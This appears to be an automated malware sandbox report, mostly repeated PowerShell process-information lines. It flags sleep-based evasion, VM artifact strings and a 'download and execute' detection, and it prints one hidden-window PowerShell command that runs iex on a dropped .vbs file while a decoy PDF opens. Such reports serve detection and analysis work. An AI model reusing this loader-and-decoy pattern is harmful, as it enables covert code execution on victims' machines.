      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5315Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4362Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6368Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3373Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1664Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep count: 6368 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1916Thread sleep count: 3373 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -9223372036854770s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 5648Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
      Source: svchost.exe, 00000007.00000002.3369589311.000002C55C658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3367675953.000002C55702F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
      Source: powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: powershell.exe, 00000003.00000002.2178720470.0000015029767000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
      Source: powershell.exe, 00000000.00000002.2422673623.0000028B29C73000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell download and execute
      Source: Yara matchFile source: amsi64_3924.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3924, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
